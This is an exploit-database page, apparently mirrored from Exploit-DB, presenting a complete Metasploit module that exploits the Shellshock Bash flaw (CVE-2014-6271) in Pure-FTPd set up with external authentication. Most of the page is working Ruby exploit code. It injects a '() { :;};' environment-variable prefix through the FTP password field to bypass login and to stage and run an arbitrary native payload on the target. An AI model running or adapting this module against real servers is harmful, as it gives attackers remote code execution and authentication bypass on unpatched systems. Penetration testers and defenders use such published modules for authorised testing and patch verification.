header-logo
Suggest Exploit
vendor:
Pure-FTPd
by:
Stephane Chazelas, Frank Denis, Spencer McIntyre
9.8
CVSS
CRITICAL
Code Injection
94
CWE
Product Name: Pure-FTPd
Affected Version From: Not available
Affected Version To: Not available
Patch Exists: YES
Related CWE: CVE-2014-6271
CPE: Not available
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-vid-81e2b308-4a6c-11e4-b711-6805ca0b3d42/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3093/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-2380-1/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-512d1301-49b9-11e4-ae2c-c80aa9043978/https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3094/https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3092/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/gnu-bash-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2014-1354/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/gnu-bash-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/hpsim-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/apple-osx-afpserver-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2014-6277/https://www.rapid7.com/db/?q=CVE-2014-6271&type=&page=2https://www.rapid7.com/db/?q=CVE-2014-6271&type=&page=3https://www.rapid7.com/db/?q=CVE-2014-6271&type=&page=4https://www.rapid7.com/db/?q=CVE-2014-6271&type=&page=2
Other Scripts:
Platforms Tested: Linux
2014

Pure-FTPd External Authentication Bash Environment Variable Code Injection

This module exploits the code injection flaw known as shellshock which leverages specially crafted environment variables in Bash. This exploit specifically targets Pure-FTPd when configured to use an external program for authentication.

Mitigation:

Patch is available
Source

Exploit-DB raw data:

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
      'Description'     => %q(
        This module exploits the code injection flaw known as shellshock which
        leverages specially crafted environment variables in Bash. This exploit
        specifically targets Pure-FTPd when configured to use an external
        program for authentication.
      ),
      'Author'          =>
        [
          'Stephane Chazelas', # Vulnerability discovery
          'Frank Denis', # Discovery of Pure-FTPd attack vector
          'Spencer McIntyre' # Metasploit module
        ],
      'References'      =>
        [
          ['CVE', '2014-6271'],
          ['OSVDB', '112004'],
          ['EDB', '34765'],
          ['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']
        ],
      'Payload'         =>
        {
          'DisableNops' => true,
          'Space'       => 2048
        },
      'Targets'         =>
        [
          [ 'Linux x86',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => :printf
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86_64,
              'CmdStagerFlavor' => :printf
            }
          ]
        ],
      'DefaultOptions' =>
        {
          'PrependFork' => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 24 2014'))
    register_options(
      [
        Opt::RPORT(21),
        OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
      ], self.class)
    deregister_options('FTPUSER', 'FTPPASS')
  end

  def check
    # this check method tries to use the vulnerability to bypass the login
    username = rand_text_alphanumeric(rand(20) + 1)
    random_id = (rand(100) + 1)
    command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
    if send_command(username, command) =~ /^2\d\d ok./i
      return CheckCode::Safe if banner !~ /pure-ftpd/i
      disconnect

      command = "echo auth_ok:0; echo end"
      if send_command(username, command) =~ /^5\d\d login authentication failed/i
        return CheckCode::Vulnerable
      end
    end
    disconnect

    CheckCode::Safe
  end

  def execute_command(cmd, _opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
    username = rand_text_alphanumeric(rand(20) + 1)
    send_command(username, cmd)
  end

  def exploit
    # Cannot use generic/shell_reverse_tcp inside an elf
    # Checking before proceeds
    if generate_payload_exe.blank?
      fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
    end

    execute_cmdstager(linemax: 500)
    handler
  end

  def send_command(username, cmd)
    cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
    connect
    send_user(username)
    password_result = send_pass(cmd)
    disconnect
    password_result
  end
end

Navigation

Suggest Exploit

Services By CQR